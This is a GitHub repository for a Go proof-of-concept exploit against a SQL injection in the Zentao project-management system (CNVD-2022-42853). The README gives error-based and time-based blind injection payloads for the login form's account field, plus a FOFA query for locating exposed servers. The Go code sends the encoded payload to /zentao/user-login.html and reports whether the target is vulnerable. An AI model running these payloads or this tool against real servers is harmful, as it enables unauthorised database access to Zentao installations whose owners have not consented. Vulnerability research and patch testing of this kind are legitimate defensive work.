├── POC.png ├── README.md ├── Zentao.go └── main.go /POC.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/west9b/ZentaoSqli/e9fd6bba684dd7b4d6fb6f19074f646c5ec2b2d7/POC.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ZentaoSqli 禅道存在SQL注入漏洞 CNVD-2022-42853 2 | 3 | author:160team.west9B 4 | 5 | **仅限用于安全研究人员在授权的情况下使用,遵守网络安全法,产生任何问题,后果自负,与作者无关。** 6 | 7 | # 01-基本介绍 8 | 9 | 漏洞编号 10 | 11 | CNVD-2022-42853 公开日期:2022/6/14 12 | 13 | 影响产品 14 | 15 | 禅道企业版 6.5 16 | 17 | 禅道旗舰版 3.0 18 | 19 | 禅道开源版 16.5 20 | 21 | 禅道开源版 16.5.beta1 22 | 23 | # 02-使用说明 24 | 25 | ## usage: ./Zentao.exe -u url (加http://) 26 | 27 | 禅道当前数据库都是zentao,判断注入条件 extractvalue(1,concat(0x7e,(database()),0x7e) == zentao 28 | 29 | 盲注payload account=admin';SELECT SLEEP(5)# 30 | 31 | # Screenshots 32 | ![Image text](https://github.com/west9b/ZentaoSqli/blob/main/POC.png) 33 | 34 | # fofa 35 | app="易软天创-禅道系统" 36 | 37 | -------------------------------------------------------------------------------- /Zentao.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/tls" 5 | "fmt" 6 | "io/ioutil" 7 | "net/http" 8 | "strings" 9 | ) 10 | 11 | func Zentao() { 12 | fmt.Println("\n-----------------------✂---------------------------") 13 | fmt.Println("禅道 v16.5 SQL注入漏洞 公开日期:2022/6/14") 14 | fmt.Println("\n-----------------------✂---------------------------") 15 | tr := &http.Transport{ 16 | TLSClientConfig: &tls.Config{ 17 | InsecureSkipVerify: true, 18 | }, 19 | } 20 | client := &http.Client{Transport: tr} 21 | //client := &http.Client{Timeout: time.Second * 10} 22 | req, err := http.NewRequest("POST", url+Zentaopath, strings.NewReader( 23 | `account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28database%28%29%29%2C0x7e%29%29%29%23`)) 24 | if err != nil { 25 | } 26 | req.Header.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0") 27 | req.Header.Add("Content-Type", "application/x-www-form-urlencoded") 28 | req.Header.Add("Referer", url+Zentaopath) 29 | resp, err := client.Do(req) 30 | if err != nil { 31 | } 32 | if err == nil { 33 | defer resp.Body.Close() 34 | body, err1 := ioutil.ReadAll(resp.Body) 35 | if err1 != nil { 36 | fmt.Println(err1) 37 | } 38 | if strings.Contains(string(body), "zentao") { 39 | fmt.Println("存在禅道 v16.5 SQL注入漏洞") 40 | } else { 41 | fmt.Println("不存在禅道 v16.5 SQL注入漏洞") 42 | } 43 | 44 | } else { 45 | fmt.Println("不存在禅道 v16.5 SQL注入漏洞") 46 | } 47 | 48 | } 49 | -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | //author:160team.west9B 4 | import ( 5 | "flag" 6 | "fmt" 7 | ) 8 | 9 | var ( 10 | url string 11 | Zentaopath = "/zentao/user-login.html" 12 | ) 13 | 14 | func init() { 15 | flag.StringVar(&url, 16 | "u", 17 | "null", 18 | "url:http://127.0.0.1/", 19 | ) 20 | 21 | } 22 | func main() { 23 | flag.Parse() 24 | fmt.Println("author:160team.west9b") 25 | if url != "null" { 26 | Zentao() 27 | return 28 | } 29 | fmt.Println("usage_poc:./ZentaoSqli.exe -u url") 30 | } 31 | --------------------------------------------------------------------------------